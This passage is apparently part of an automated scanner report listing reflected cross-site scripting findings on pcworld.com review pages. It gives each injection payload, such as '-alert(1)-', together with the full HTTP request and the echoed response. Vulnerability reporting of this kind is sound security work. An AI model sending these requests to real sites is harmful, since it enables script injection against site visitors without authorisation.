The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f9c0'-alert(1)-'a1547080d17 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1602/top_10_digital_slr_cameras.html7f9c0'-alert(1)-'a1547080d17 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=545FAD25320AB3369AA7EA6514631C5A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:03 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1602/top_10_digital_slr_cameras.html7f9c0'-alert(1)-'a1547080d17';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.94. http://www.pcworld.com/reviews/collection/1603/top_10_point_and_shoot_cameras.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1603/top_10_point_and_shoot_cameras.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6963a'-alert(1)-'e6565f9c2c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1603/top_10_point_and_shoot_cameras.html6963a'-alert(1)-'e6565f9c2c0 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B3E0947D07A0FB3D1931606E389570FB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:56 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Email');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1603/top_10_point_and_shoot_cameras.html6963a'-alert(1)-'e6565f9c2c0';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.95. http://www.pcworld.com/reviews/collection/1645/top_10_power_desktop_pcs.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1645/top_10_power_desktop_pcs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e9ab0'-alert(1)-'9a22c791136 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1645/top_10_power_desktop_pcs.htmle9ab0'-alert(1)-'9a22c791136 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2B1ABF43223BFA00F4C685D97A44DAFB; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:32 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1645/top_10_power_desktop_pcs.htmle9ab0'-alert(1)-'9a22c791136';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.96. http://www.pcworld.com/reviews/collection/1646/top_10_value_desktop_pcs.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1646/top_10_value_desktop_pcs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5707'-alert(1)-'58fcd28a68e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1646/top_10_value_desktop_pcs.htmle5707'-alert(1)-'58fcd28a68e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1646/top_10_value_desktop_pcs.htmle5707'-alert(1)-'58fcd28a68e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.97. http://www.pcworld.com/reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d089'-alert(1)-'8cd45779378 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html8d089'-alert(1)-'8cd45779378 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5FE251E163A0FAF407CE859E554445CD; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:17 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1647/Best_Budget_All_in_One_PCs_20_Inches_Or_Smaller.html8d089'-alert(1)-'8cd45779378';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.98. http://www.pcworld.com/reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd296'-alert(1)-'1d9c3784495 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.htmlcd296'-alert(1)-'1d9c3784495 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:49 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1648/top_5_all_in_one_pcs_20_inches_or_larger.htmlcd296'-alert(1)-'1d9c3784495';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.99. http://www.pcworld.com/reviews/collection/1649/top_5_gps_devices.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1649/top_5_gps_devices.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bab18'-alert(1)-'48b4d1f4030 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1649/top_5_gps_devices.htmlbab18'-alert(1)-'48b4d1f4030 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=445D8ACD7E522CF6D17B00852EA21E7B; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:39 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1649/top_5_gps_devices.htmlbab18'-alert(1)-'48b4d1f4030';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.100. http://www.pcworld.com/reviews/collection/1650/top_10_external_hard_drives.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1650/top_10_external_hard_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd84f'-alert(1)-'3ad93113d2d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1650/top_10_external_hard_drives.htmlfd84f'-alert(1)-'3ad93113d2d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C19F66C9EF2204D488C29D334D647575; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1650/top_10_external_hard_drives.htmlfd84f'-alert(1)-'3ad93113d2d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.101. http://www.pcworld.com/reviews/collection/1651/top_10_network_attached_storage_devices.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1651/top_10_network_attached_storage_devices.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e54d'-alert(1)-'74df4de751c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1651/top_10_network_attached_storage_devices.html6e54d'-alert(1)-'74df4de751c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:31 GMT
Connection: close
Vary: Accept-Encoding

                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
l');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1651/top_10_network_attached_storage_devices.html6e54d'-alert(1)-'74df4de751c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.102. http://www.pcworld.com/reviews/collection/1651/top_10_network_attached_storage_devices.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.pcworld.com
Path:	/reviews/collection/1651/top_10_network_attached_storage_devices.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51886"><a>eb8fa4341a7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1651/top_10_network_attached_storage_devices.html51886"><a>eb8fa4341a7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=046FC7F90CB57F59181865276A5D8CD7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:23 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
reviews/products/storage/hard_drives/chart;pg=chart;c=2111;c=2111;c=2112;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&url=/reviews/collection/1651/top_10_network_attached_storage_devices.html51886"><a>eb8fa4341a7"/>
...[SNIP]...

1.103. http://www.pcworld.com/reviews/collection/1652/top_5_internal_hard_drives.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1652/top_5_internal_hard_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d47d'-alert(1)-'9e688f26a03 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1652/top_5_internal_hard_drives.html2d47d'-alert(1)-'9e688f26a03 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=0EC602CDA7385FD361E4600F7A3C8AF7; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:59 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1652/top_5_internal_hard_drives.html2d47d'-alert(1)-'9e688f26a03';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.104. http://www.pcworld.com/reviews/collection/1653/top_42_inch_hdtvs.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1653/top_42_inch_hdtvs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecbe0'-alert(1)-'7f834a4b0f2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1653/top_42_inch_hdtvs.htmlecbe0'-alert(1)-'7f834a4b0f2 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7556E427D340FC45B604D5800EB662A9; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:15 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
dCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1653/top_42_inch_hdtvs.htmlecbe0'-alert(1)-'7f834a4b0f2';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.105. http://www.pcworld.com/reviews/collection/1654/top_5_46_and_47inch_hdtvs.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1654/top_5_46_and_47inch_hdtvs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e127a'-alert(1)-'eecea77240f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1654/top_5_46_and_47inch_hdtvs.htmle127a'-alert(1)-'eecea77240f HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:59:52 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
'userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1654/top_5_46_and_47inch_hdtvs.htmle127a'-alert(1)-'eecea77240f';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.106. http://www.pcworld.com/reviews/collection/1655/top_big_hdtvs.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1655/top_big_hdtvs.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 319c0'-alert(1)-'270596086d7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1655/top_big_hdtvs.html319c0'-alert(1)-'270596086d7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=52452A436E3F21EF8B1C2E57C580111F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:03:25 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
_readCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1655/top_big_hdtvs.html319c0'-alert(1)-'270596086d7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.107. http://www.pcworld.com/reviews/collection/1656/top_bluray_disc_players.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1656/top_bluray_disc_players.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 797e1'-alert(1)-'9c0f310588 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1656/top_bluray_disc_players.html797e1'-alert(1)-'9c0f310588 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:50 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
e('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1656/top_bluray_disc_players.html797e1'-alert(1)-'9c0f310588';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.108. http://www.pcworld.com/reviews/collection/1657/top_10_allpurpose_laptops.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1657/top_10_allpurpose_laptops.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51789'-alert(1)-'9884d94cdac was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1657/top_10_allpurpose_laptops.html51789'-alert(1)-'9884d94cdac HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=10E4087C05404C7142DDFF8F8FB4735F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:19 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
'userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1657/top_10_allpurpose_laptops.html51789'-alert(1)-'9884d94cdac';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.109. http://www.pcworld.com/reviews/collection/1658/top_10_netbooks.html [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.pcworld.com
Path:	/reviews/collection/1658/top_10_netbooks.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1edca'-alert(1)-'9e9fad76bb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /reviews/collection/1658/top_10_netbooks.html1edca'-alert(1)-'9e9fad76bb9 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
